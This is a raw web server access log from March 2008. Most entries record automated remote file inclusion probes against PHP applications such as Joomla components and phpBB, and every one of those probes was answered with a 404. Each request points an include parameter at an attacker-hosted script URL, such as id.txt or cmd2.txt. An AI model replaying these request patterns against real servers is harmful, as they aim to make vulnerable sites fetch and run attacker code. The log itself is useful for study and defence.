81.89.137.99 - - [17/Mar/2008:06:38:53 -0700] "GET /logs/access_080120.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.150.15.135 - - [17/Mar/2008:06:39:38 -0700] "GET /logs/access_080119.log//codebb/lang_select?phpbb_root_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.220 - - [17/Mar/2008:06:40:28 -0700] "GET /logs/access_080208.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.164.242.195 - - [17/Mar/2008:06:40:54 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir[inc]=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.164.242.195 - - [17/Mar/2008:06:40:55 -0700] "GET //inc/cmses/aedatingCMS.php?dir[inc]=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.164.242.195 - - [17/Mar/2008:06:40:55 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir[inc]=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:06:41:05 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:06:41:06 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:06:41:07 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:06:41:16 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.72.208.31 - - [17/Mar/2008:06:41:16 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pathttp://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.72.208.31 - - [17/Mar/2008:06:41:16 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pathttp://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:06:41:16 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:06:41:17 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.164.242.195 - - [17/Mar/2008:06:41:48 -0700] "GET /logs/access_080124.log//inc/cmses/aedatingCMS.php?dir[inc]=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.9.66 - - [17/Mar/2008:06:42:04 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.66 - - [17/Mar/2008:06:42:05 -0700] "GET /errors.php?error=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.66 - - [17/Mar/2008:06:42:05 -0700] "GET /logs/errors.php?error=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:06:42:09 -0700] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.223.191 - - [17/Mar/2008:06:42:28 -0700] "GET /index.php?option=com_virtuemart&page=viewcat&catid=&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
213.215.223.191 - - [17/Mar/2008:06:42:29 -0700] "GET /logs/index.php?option=com_virtuemart&page=viewcat&catid=&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:06:42:31 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:06:42:36 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:06:42:38 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:42:41 -0700] "GET /logs/access_080120.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.72.208.31 - - [17/Mar/2008:06:42:53 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
69.72.208.31 - - [17/Mar/2008:06:42:53 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
89.108.67.115 - - [17/Mar/2008:06:43:58 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.115 - - [17/Mar/2008:06:43:59 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.115 - - [17/Mar/2008:06:44:00 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:06:44:00 -0700] "GET /logs/access_080207.log//config.php?path_to_root=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:06:44:00 -0700] "GET //config.php?path_to_root=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.115 - - [17/Mar/2008:06:44:01 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.115 - - [17/Mar/2008:06:44:01 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:06:44:02 -0700] "GET /logs//config.php?path_to_root=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.115 - - [17/Mar/2008:06:44:02 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.22.10.105 - - [17/Mar/2008:06:44:06 -0700] "GET /index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.164.242.195 - - [17/Mar/2008:06:44:16 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.164.242.195 - - [17/Mar/2008:06:44:16 -0700] "GET /errors.php?error=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.164.242.195 - - [17/Mar/2008:06:44:17 -0700] "GET /logs/errors.php?error=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.252 - - [17/Mar/2008:06:44:29 -0700] "GET /logs/access_080131.log//faqsupport/samplefaqsupport.php?path[docroot]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.252 - - [17/Mar/2008:06:44:29 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.252 - - [17/Mar/2008:06:44:30 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.50.214.191 - - [17/Mar/2008:06:44:48 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [17/Mar/2008:06:45:43 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.239.121.190 - - [17/Mar/2008:06:45:44 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://erwinedillon.com/cvstaff/paypal/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.116.41.19 - - [17/Mar/2008:06:45:49 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [17/Mar/2008:06:46:50 -0700] "GET /logs/access.log///components/com_performs/performs.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [17/Mar/2008:06:46:50 -0700] "GET /logs///components/com_performs/performs.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.235.74 - - [17/Mar/2008:06:46:54 -0700] "GET /index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.95.138.95 - - [17/Mar/2008:06:47:04 -0700] "GET /logs/access_080124.log//includes/kb_constants.php?module_root_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.95.138.95 - - [17/Mar/2008:06:47:05 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.85.198 - - [17/Mar/2008:06:47:18 -0700] "GET ///modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [17/Mar/2008:06:47:19 -0700] "GET /index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:47:28 -0700] "GET /logs/access_080215.log/mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:47:28 -0700] "GET /logs/access_080215.log/mcf.php?content=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:47:28 -0700] "GET /logs/mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:47:28 -0700] "GET /logs/mcf.php?content=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:47:32 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:47:32 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:47:32 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:47:37 -0700] "GET /logs/access.log/mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:47:38 -0700] "GET /logs/access.log/mcf.php?content=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
220.95.138.95 - - [17/Mar/2008:06:47:43 -0700] "GET /logs/access_080118.log//includes/kb_constants.php?module_root_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.246.21.243 - - [17/Mar/2008:06:47:49 -0700] "GET /index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [17/Mar/2008:06:47:57 -0700] "GET /logs/access_080119.log/index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [17/Mar/2008:06:47:57 -0700] "GET /logs/index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.199.20 - - [17/Mar/2008:06:47:59 -0700] "GET /errors.php?error=http://http://shadowstargames.com/store/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
64.34.199.20 - - [17/Mar/2008:06:48:00 -0700] "GET /logs/errors.php?error=http://http://shadowstargames.com/store/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
84.246.21.243 - - [17/Mar/2008:06:48:02 -0700] "GET /index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.22.10.105 - - [17/Mar/2008:06:48:06 -0700] "GET /index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:06:48:32 -0700] "GET /logs/access_080225.log//docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:06:48:32 -0700] "GET //docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:06:48:33 -0700] "GET /logs//docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [17/Mar/2008:06:48:37 -0700] "GET /logs/access_080225.log///components/com_performs/performs.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.246.21.243 - - [17/Mar/2008:06:48:56 -0700] "GET /logs/access_080119.log/index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.246.21.243 - - [17/Mar/2008:06:48:56 -0700] "GET /logs/index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.22.10.105 - - [17/Mar/2008:06:48:57 -0700] "GET /logs/access_080119.log/index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.22.10.105 - - [17/Mar/2008:06:48:57 -0700] "GET /logs/index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.14.221.150 - - [17/Mar/2008:06:49:15 -0700] "GET //display.php?page=&lang=http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:06:49:28 -0700] "GET /logs/access_080207.log//docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.214.191 - - [17/Mar/2008:06:49:57 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.214.191 - - [17/Mar/2008:06:49:57 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [17/Mar/2008:06:50:16 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.214.191 - - [17/Mar/2008:06:50:17 -0700] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.249.224 - - [17/Mar/2008:06:50:34 -0700] "GET /logs/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.nedaleko.ru/en/img/contr.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
209.216.249.224 - - [17/Mar/2008:06:50:34 -0700] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.nedaleko.ru/en/img/contr.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
208.116.41.19 - - [17/Mar/2008:06:51:53 -0700] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.246.21.243 - - [17/Mar/2008:06:52:07 -0700] "GET /index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.210.111.98 - - [17/Mar/2008:06:52:14 -0700] "GET /logs/access_080228.log//?mosConfig_absolute_path=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.95.138.95 - - [17/Mar/2008:06:52:28 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.210.111.98 - - [17/Mar/2008:06:52:45 -0700] "GET /logs/access_080215.log//?mosConfig_absolute_path=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.14.221.150 - - [17/Mar/2008:06:53:07 -0700] "GET /logs/access.log//display.php?page=&lang=http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.150 - - [17/Mar/2008:06:53:08 -0700] "GET //display.php?page=&lang=http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.150 - - [17/Mar/2008:06:53:08 -0700] "GET /logs//display.php?page=&lang=http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.31.48 - - [17/Mar/2008:06:53:17 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.21.120 - - [17/Mar/2008:06:53:18 -0700] "GET /logs/access_071029.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.130.191.252 - - [17/Mar/2008:06:53:23 -0700] "GET /logs/access_080124.log//faqsupport/samplefaqsupport.php?path[docroot]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.2.130 - - [17/Mar/2008:06:53:25 -0700] "GET /index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:06:53:35 -0700] "GET /logs/access_080228.log//config.php?path_to_root=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.22.10.105 - - [17/Mar/2008:06:54:44 -0700] "GET /index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.121.190 - - [17/Mar/2008:06:55:11 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://erwinedillon.com/cvstaff/paypal/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.121.190 - - [17/Mar/2008:06:55:12 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://erwinedillon.com/cvstaff/paypal/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:56:14 -0700] "GET /logs/access_080131.log/convert/mvcw.php?vwar_root=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:56:14 -0700] "GET /convert/mvcw.php?vwar_root=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:56:15 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.25.160 - - [17/Mar/2008:06:56:17 -0700] "GET /logs/access_080225.log//oneadmin/newspublish/include.php?path[docroot]=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.160 - - [17/Mar/2008:06:56:17 -0700] "GET //oneadmin/newspublish/include.php?path[docroot]=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
